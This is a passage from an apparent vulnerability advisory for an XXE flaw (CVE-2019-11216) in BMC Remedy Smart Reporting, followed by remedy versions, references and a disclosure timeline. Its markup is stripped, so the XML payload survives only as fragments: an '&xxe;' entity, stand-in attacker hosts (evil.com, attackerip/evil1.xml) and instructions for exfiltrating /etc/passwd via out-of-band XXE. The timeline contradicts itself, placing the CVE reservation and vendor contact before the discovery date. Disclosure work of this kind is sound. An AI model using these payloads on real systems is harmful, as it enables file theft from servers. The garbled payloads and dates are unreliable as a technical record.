]> 4 43 7.3 20180418 2019-01-18 10:14 UTC (+0000) 66717 &xxe; testburpDESC test Fi8IDs5q9p4= GENERICUSER SSRS evil.com http://wvil.com/a.txt GENERICJDBC 1 5 3 180 UNSECURE 0 true true true AUSTRALIA/SYDNEY 0 0 0 0 0 TEXT SOURCECLASSNAME 0 com.hof.sources.SSRSSourcePlatformImplementation 0 true After loading the file, the web application should show the file "/etc/passwd" inside the HTML code. When reading XML files, the exploit must use OOB XXE because the content of the file must be included inside "CDATA" tags, the XML payload is as follow: XML File for XXE CDATA exfiltration: !DOCTYPE data [ "> %dtd; ]> [...] &all; [...] Content of "evil1.xml" is: The vulnerable server must be able to reach the file uploaded at http://attackerip/evil1.xml. 3. Solution: Remedy Smart Reporting version 9.1.03.001 requires upgrade to the latest hot fix bundle of this version. Remedy Smart Reporting version 9.1.04.002 requires upgrade to the latest hot fix bundle of this version. Remedy Smart Reporting version 18.05.05 requires upgrade to the latest hot fix bundle of this version. Remedy Smart Reporting version 19.02.01 requires upgrade to the latest hot fix bundle of this version. 4. References CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11216 Vendor advisory: https://bmcsites.force.com/casemgmt/sc_KnowledgeArticle?sfdcid=kA21O000000dKWrSAM&type=Solution Product info: https://docs.bmc.com/docs/itsm90/export-and-import-repository-509983929.html 5. Dates 01/18/2019 - Discovered Vulnerability 04/12/2018 - CVE Reserved 04/17/2018 - Details sent to Vendor 05/07/2019 - Vendor confirms that product is vulnerable 11/12/2019 - Vendor published an advisory 11/12/2019 - Public disclosure -->